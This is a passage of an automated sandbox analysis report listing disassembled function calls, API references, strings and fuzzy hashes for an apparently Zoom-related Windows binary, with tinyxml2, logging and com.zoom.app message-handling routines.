                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ??0XMLPrinter@tinyxml2@@QAE@PAU_iobuf@@_NH@Z.RWSNDPQSKZ(00000000,?,00000000), ref: 00CB276C
                  • Part of subcall function 00CB2A90: __EH_prolog3.LIBCMT ref: 00CB2A97
                • ?Print@XMLDocument@tinyxml2@@QBEXPAVXMLPrinter@2@@Z.RWSNDPQSKZ(?,00000000,?,00000000), ref: 00CB277D
                  • Part of subcall function 00CB2860: __EH_prolog3_GS.LIBCMT ref: 00CB286A
                  • Part of subcall function 00CB2860: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB2880
                • ??1XMLPrinter@tinyxml2@@UAE@XZ.RWSNDPQSKZ(?,00000000,?,00000000), ref: 00CB278B
                Similarity
                • API ID: Document@tinyxml2@@H_prolog3_Pair@tinyxml2@@Printer@tinyxml2@@$Cmm@@Error@Error@2@H_prolog3Print@Printer@2@@Reset@State@Str@U_iobuf@@_Unlock@
                • String ID:
                • API String ID: 1064447030-0
                • Opcode ID: db4bc00d4d1597ca8d892cb8e296bda55842c9dce8a73c3a38159ac5be01ec07
                • Instruction ID: f1e5907c5815b8bc0e19fdc86f4e1f08c92fcba7e87d04a4e6fa87ef5e799785
                • Opcode Fuzzy Hash: db4bc00d4d1597ca8d892cb8e296bda55842c9dce8a73c3a38159ac5be01ec07
                • Instruction Fuzzy Hash: 1BF03932900599ABCB26FA52CC05EDF7A38EBD5700F404098B40927261CB715B81EBA0
                APIs
                Strings
                Similarity
                • API ID: __freea
                • String ID: a/p$am/pm
                • API String ID: 240046367-3206640213
                • Opcode ID: 6b09a3074de52fb23626e23425deceff1ccc53615e7f0b1e1843046fafe2ad0d
                • Instruction ID: 18657437e1e99b3f91c851fb17c37daa37a924109defc0e3b35074b5da68795d
                • Opcode Fuzzy Hash: 6b09a3074de52fb23626e23425deceff1ccc53615e7f0b1e1843046fafe2ad0d
                • Instruction Fuzzy Hash: 5CC12435900296DBDF24CF6BC884BBAB7B0FF55780F284149E926AB350D3359E41CBA5
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBA68C
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,0000002C,00CB6140,?,?,00000048,00000000,?,?), ref: 00CBA6FB
                • __floor_pentium4.LIBCMT ref: 00CBA789
                Strings
                • unordered_map/set too long, xrefs: 00CBA842
                Similarity
                • API ID: ??0?$Cmm@@H_prolog3StringV01@@__floor_pentium4
                • String ID: unordered_map/set too long
                • API String ID: 4005500430-306623848
                • Opcode ID: 54b58f3adc61b503cfa7bfe02b0911b6fd32835973f16cd924a4291433ba60d9
                • Instruction ID: 85f8ebe4c3f3d8400c2ac516c812e4ab2e859123ec3c2777f78923a9e0c32ce4
                • Opcode Fuzzy Hash: 54b58f3adc61b503cfa7bfe02b0911b6fd32835973f16cd924a4291433ba60d9
                • Instruction Fuzzy Hash: 4951C171900709DFCB15DFA9C040AADFBB4FF58314F24861EE486B7252EB71A986CB51
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBAA02
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,0000001C,unordered_map/set too long,?,?,00000000,?,0000001C,00CB558F,?,?,00000000), ref: 00CBAA6E
                • __floor_pentium4.LIBCMT ref: 00CBAAE5
                Strings
                • unordered_map/set too long, xrefs: 00CBAB9E
                Similarity
                • API ID: ??0?$Cmm@@H_prolog3StringV01@@__floor_pentium4
                • String ID: unordered_map/set too long
                • API String ID: 4005500430-306623848
                • Opcode ID: 00df2742f411a0acb2c15eb83d928e521fab0188c7a6b618214e41f7c60a9452
                • Instruction ID: fc5aa434395b7fdcad479c1f518fa0b9f0fcd83841bea0426d50c3953ad46182
                • Opcode Fuzzy Hash: 00df2742f411a0acb2c15eb83d928e521fab0188c7a6b618214e41f7c60a9452
                • Instruction Fuzzy Hash: F151CD719007098FCB25DFA5C480AEDF7F9FF58314F20861AE496B7251EB70A986CB51
                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE8AC7
                • CatchIt.LIBVCRUNTIME ref: 00CE8BAD
                Strings
                Similarity
                • API ID: CatchEncodePointer
                • String ID: MOC$RCC
                • API String ID: 1435073870-2084237596
                • Opcode ID: eee011d916d20a006869cb5c3b19554b929041aedf4f46e41d7f49e9c5e3a8a7
                • Instruction ID: a9ca777cebd6676ae3c4381180a3aa6d451392a233d86fc78073602d98e78eb8
                • Opcode Fuzzy Hash: eee011d916d20a006869cb5c3b19554b929041aedf4f46e41d7f49e9c5e3a8a7
                • Instruction Fuzzy Hash: B84167B1900249EFCF16DF99CC81EAEBBB5BF08300F188099F918B7221D7359A55DB50
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE4D1
                • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,Global\,?,?,?,00000050,00CADE1F,00000004), ref: 00CBE5C1
                • InitializeCriticalSection.KERNEL32(00000000,00000050,00CADE1F,00000004), ref: 00CBE5FF
                Strings
                Similarity
                • API ID: CreateCriticalH_prolog3_InitializeMutexSection
                • String ID: Global\
                • API String ID: 2906485231-188423391
                • Opcode ID: 4ccfab07915b648ba0b1f5edb7ea4dc21089115da572150fd0ca415de2e0f732
                • Instruction ID: 06910fca4757968ad17248d5aadc2294c2158dc55d323f2ce67a84ba47eaa5dd
                • Opcode Fuzzy Hash: 4ccfab07915b648ba0b1f5edb7ea4dc21089115da572150fd0ca415de2e0f732
                • Instruction Fuzzy Hash: 6E418970D04309DECF14DFE9D895AEDBBB4AF18704F54502EE401B2251EB705A89DF62
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE0155
                  • Part of subcall function 00CE2016: __EH_prolog3.LIBCMT ref: 00CE201D
                  • Part of subcall function 00CE2016: CoCreateGuid.OLE32(00000000,00000010,00CDE40F,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE2048
                  • Part of subcall function 00CE2016: UuidToStringA.RPCRT4(00000000,00000000), ref: 00CE2057
                  • Part of subcall function 00CE2016: RpcStringFreeA.RPCRT4(00000000), ref: 00CE2080
                • CloseHandle.KERNEL32(?,00000014,00CDE536,00000000,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00CE0183
                Strings
                Similarity
                • API ID: H_prolog3String$CloseCreateFreeGuidHandleUuid
                • String ID: %s\%s_%s\%s$Local\CrashRptEvent_%s
                • API String ID: 2012482178-786833359
                • Opcode ID: c6d4515c270509fdff6ccb18481723cdedd60f5a44620b1b5b04ff43666fb333
                • Instruction ID: 5505db4f8ac0b6d60e335f2a9d05d1bc27f88442884944bf8b7fc95aba76548f
                • Opcode Fuzzy Hash: c6d4515c270509fdff6ccb18481723cdedd60f5a44620b1b5b04ff43666fb333
                • Instruction Fuzzy Hash: A93123B1910646ABCB15EFB1CD96AFEF368BF10300F40051AF61663291DF746A18EBA1
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBA575
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,00000014,00CB619C,?,?,?,?,?,?,00000048,00000000,?), ref: 00CBA5D6
                • ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,?,?,?,00000000,?,00000014,00CB619C,?,?,?,?,?,?,00000048,00000000), ref: 00CBA5E8
                  • Part of subcall function 00CE2896: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CE28A2
                Strings
                • unordered_map/set too long, xrefs: 00CBA67A
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$E@$$H_prolog3std::invalid_argument::invalid_argument
                • String ID: unordered_map/set too long
                • API String ID: 3020564804-306623848
                • Opcode ID: 3d2bb529fd3caa0b49b2d90963224a811da339b0692a18d69837082891a32622
                • Instruction ID: f47d17901064d433c277c3ba11401c8914492621d8be93f007cd37e6e473e119
                • Opcode Fuzzy Hash: 3d2bb529fd3caa0b49b2d90963224a811da339b0692a18d69837082891a32622
                • Instruction Fuzzy Hash: 3631E4719007489FCB15DFB4C845EEEB7B8EF18305F108609F486B7292EB34AA84DB61
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBA0B5
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000007,?,00000000,?,00000014,00000018,00CB6872,?,00000007,?,?,?,?,?), ref: 00CBA122
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(000000C8,?,00000007,?,00000000,?,00000014,00000018,00CB6872,?,00000007,?,?,?,?,?), ref: 00CBA131
                  • Part of subcall function 00CE2896: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CE28A2
                Strings
                • unordered_map/set too long, xrefs: 00CBA1D2
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3std::invalid_argument::invalid_argument
                • String ID: unordered_map/set too long
                • API String ID: 2161975730-306623848
                • Opcode ID: 76c52f7653d5380b995bc04751924df04130dbfb23469ef9cf80075a9d0c94cc
                • Instruction ID: 54d0108af7759f470d84ff73f057fdc15817d3856ce5d804860dd1833c7e4051
                • Opcode Fuzzy Hash: 76c52f7653d5380b995bc04751924df04130dbfb23469ef9cf80075a9d0c94cc
                • Instruction Fuzzy Hash: 0331AE319006489FDB15EFA4C805BEDB7B5EF04314F008219F54ABB392EB709A85EB61
                APIs
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                • ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                Strings
                • Error=%s ErrorID=%d (0x%x) Line number=%d, xrefs: 00CB291E
                Similarity
                • API ID: Pair@tinyxml2@@$Reset@Str@
                • String ID: Error=%s ErrorID=%d (0x%x) Line number=%d
                • API String ID: 3686475888-3947640579
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAC308
                  • Part of subcall function 00CAD3AC: __EH_prolog3.LIBCMT ref: 00CAD3B3
                • ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,000000BC), ref: 00CAC349
                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CAC3AA
                Strings
                Similarity
                • API ID: AssignCmm@@D@2@@std@@@D@std@@H_prolog3H_prolog3_Ios_base_dtorOther@?$StringU?$char_traits@V12@V?$allocator@V?$basic_string@std::ios_base::_
                • String ID: \\.\pipe\Zoom.
                • API String ID: 3156310435-2585970374
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAE387
                  • Part of subcall function 00CAEA80: __EH_prolog3.LIBCMT ref: 00CAEA87
                • GetLastError.KERNEL32(?,00000004), ref: 00CAE3BA
                • ?Init@LogMessage@logging@@AAEXPBDH@Z.RWSNDPQSKZ(?,?,?,00000004), ref: 00CAE3CF
                  • Part of subcall function 00CAE4C0: __EH_prolog3_GS.LIBCMT ref: 00CAE4CA
                  • Part of subcall function 00CAE4C0: ??0StringPiece@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(UNKNOWN-FILE,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE4EE
                  • Part of subcall function 00CAE4C0: GetCurrentProcessId.KERNEL32(?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE518
                  • Part of subcall function 00CAE4C0: GetCurrentThreadId.KERNEL32 ref: 00CAE538
                  • Part of subcall function 00CAE4C0: ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE579
                  • Part of subcall function 00CA21D0: __EH_prolog3_catch.LIBCMT ref: 00CA21D7
                Strings
                Similarity
                • API ID: Cmm@@CurrentH_prolog3$ErrorExplode@Exploded@12@@H_prolog3_H_prolog3_catchInit@LastLocalMessage@logging@@Piece@ProcessStringThreadTime@
                • String ID: Check failed:
                • API String ID: 716325226-2134869012
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAE307
                  • Part of subcall function 00CAEA80: __EH_prolog3.LIBCMT ref: 00CAEA87
                • GetLastError.KERNEL32(?,00000008), ref: 00CAE33B
                • ?Init@LogMessage@logging@@AAEXPBDH@Z.RWSNDPQSKZ(?,?,?,00000008), ref: 00CAE350
                  • Part of subcall function 00CAE4C0: __EH_prolog3_GS.LIBCMT ref: 00CAE4CA
                  • Part of subcall function 00CAE4C0: ??0StringPiece@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(UNKNOWN-FILE,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE4EE
                  • Part of subcall function 00CAE4C0: GetCurrentProcessId.KERNEL32(?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE518
                  • Part of subcall function 00CAE4C0: GetCurrentThreadId.KERNEL32 ref: 00CAE538
                  • Part of subcall function 00CAE4C0: ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE579
                  • Part of subcall function 00CA21D0: __EH_prolog3_catch.LIBCMT ref: 00CA21D7
                Strings
                Similarity
                • API ID: Cmm@@CurrentH_prolog3$ErrorExplode@Exploded@12@@H_prolog3_H_prolog3_catchInit@LastLocalMessage@logging@@Piece@ProcessStringThreadTime@
                • String ID: Check failed:
                • API String ID: 716325226-2134869012
                APIs
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(true), ref: 00C6459B
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(false,true), ref: 00C645B4
                Strings
                Similarity
                • API ID: Cmm@@Compare@?$String
                • String ID: false$true
                • API String ID: 3476810042-2658103896
                APIs
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(true), ref: 00C645DB
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(false,true), ref: 00C645F4
                Strings
                Similarity
                • API ID: Cmm@@Compare@?$String
                • String ID: false$true
                • API String ID: 3476810042-2658103896
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E0C7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.unload.response,00009CDA,Result,00000004), ref: 00C6E0E2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.cec.unload.response
                • API String ID: 4281283084-445093854
                APIs
                • __EH_prolog3.LIBCMT ref: 00C740C7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.notify.zp.features,00002776,originalData,00000004), ref: 00C740E2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.notify.zp.features$originalData
                • API String ID: 3166440930-1508911518
                APIs
                • __EH_prolog3.LIBCMT ref: 00C700C7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.update.call.session.summary.response,00009CE4,JsonValue,00000004), ref: 00C700E2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsonValue$com.zoom.app.assistant.update.call.session.summary.response
                • API String ID: 3166440930-3090541172
                APIs
                • __EH_prolog3.LIBCMT ref: 00C760F7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.query.default.giphy.rsp,000027D2,defaultGiphySerializeData,00000004), ref: 00C76112
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.pmc.query.default.giphy.rsp$defaultGiphySerializeData
                • API String ID: 3166440930-1607496937
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68047
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.meetingParamChanged,00002755,meetingToken,00000004), ref: 00C68062
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.pt.meetingParamChanged$meetingToken
                • API String ID: 3166440930-3328530961
                • Opcode ID: 9741fbcc4550a489f97468e1b4dc1dda29a2191b072479f38bd403127bf8ad42
                • Instruction ID: c71a5be45654ecea71c255c76a5f41e1fdaee12a55065db299137eee3bbe0bae
                • Opcode Fuzzy Hash: 9741fbcc4550a489f97468e1b4dc1dda29a2191b072479f38bd403127bf8ad42
                • Instruction Fuzzy Hash: CCE0D8B0900B9097C7216B15DC49B1E62B8AB64726F840928B2055F3D1CFF44988D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E067
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.load.response,00009CD8,cecDeviceCounts,00000004), ref: 00C6E082
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: cecDeviceCounts$com.zoom.app.assistant.cec.load.response
                • API String ID: 4281283084-1765138920
